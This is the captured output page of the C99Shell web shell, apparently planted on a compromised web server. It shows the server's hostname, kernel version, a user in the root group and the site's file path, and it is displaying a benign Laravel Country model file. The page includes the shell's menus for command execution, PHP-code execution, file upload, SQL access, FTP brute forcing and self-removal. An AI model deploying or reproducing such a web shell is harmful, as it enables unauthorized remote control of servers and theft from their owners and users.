!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/GeoLocale/Entities/   drwxr-xr-x
Free 26.2 GB of 117.98 GB (22.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Country.php (3.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Modules\GeoLocale\Entities;

use 
Illuminate\Database\Eloquent\Model;
use 
Modules\GeoLocale\Traits\GeoLocaleTrait;

/**
 * Country
 */
class Country extends Model
{
    use 
GeoLocaleTrait;

    
/**
     * The database table doesn't use 'created_at' and 'updated_at' so we disable it from Inserts/Updates.
     *
     * @var bool
     */
    
public $timestamps false;

    
/**
     * The database table used by the model.
     *
     * @var string
     */
    
protected $table 'geolocale_countries';

    
/**
     * The attributes that should be casted to native types.
     *
     * @var array
     */
    
protected $casts = [
        
'has_division' => 'boolean',
    ];

    
/**
     * append names
     *
     * @var array
     */
    
protected $appends = ['local_name','local_full_name','local_alias''local_abbr''local_currency_name'];

    
/**
     * Relation with Division model
     *
     * @return \Illuminate\Database\Eloquent\Relations\HasMany
     */
    
public function divisions()
    {
        return 
$this->hasMany(Division::class);
    }

    
/**
     * Relation with City model
     *
     * @return \Illuminate\Database\Eloquent\Relations\HasMany
     */
    
public function cities()
    {
        return 
$this->hasMany(City::class);
    }

    
/**
     * Relation with Continent model
     *
     * @return \Illuminate\Database\Eloquent\Relations\BelongsTo
     */
    
public function continent()
    {
        return 
$this->belongsTo(Continent::class);
    }

    
/**
     * Get next level
     *
     * @return collection
     */
    
public function children()
    {
        if (
$this->has_division == true) {
            return 
$this->divisions;
        }
        return 
$this->cities;
    }

    
/**
     * Get up level
     *
     * @return Continent
     */
    
public function parent()
    {
        return 
$this->continent;
    }

    
/**
     * Relation with CountryLocale model
     *
     * @return \Illuminate\Database\Eloquent\Relations\HasMany
     */
    
public function locales()
    {
        return 
$this->hasMany(CountryLocale::class);
    }

    
/**
     * Get alias of locale
     *
     * @return string
     */
    
public function getLocalCurrencyNameAttribute()
    {
        if (
$this->locale == $this->defaultLocale) {
            return 
$this->currency_name;
        }
        
$localized $this->getLocalized();
        if (!
is_null($localized)) {
            return !
is_null($localized->currency_name) ? $localized->currency_name$this->currency_name;
        }
        return 
$this->currency_name;
    }
    
/**
     * Get country by name
     *
     * @param string $name
     * @return collection
     */
    
public static function getByName($name)
    {
        
$localized CountryLocale::where('name'$name)->first();
        if (
is_null($localized)) {
            return 
$localized;
        }
        return 
$localized->country;
    }

    
/**
     * Search country by name
     *
     * @param string $name
     * @return collection
     */
    
public static function searchByName($name)
    {
        return 
CountryLocale::where('name''like'"%" $name "%")
            ->
get()->map(function ($item) {
                return 
$item->country;
            });
    }

    
/**
     * Get country name by code
     *
     * @param string $code
     * @return string
     */
    
public static function getNameByCode($code)
    {
        
$country parent::firstWhere('code'$code);

        if (
is_null($country)) {
            return 
$code;
        }

        return 
$country->name;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--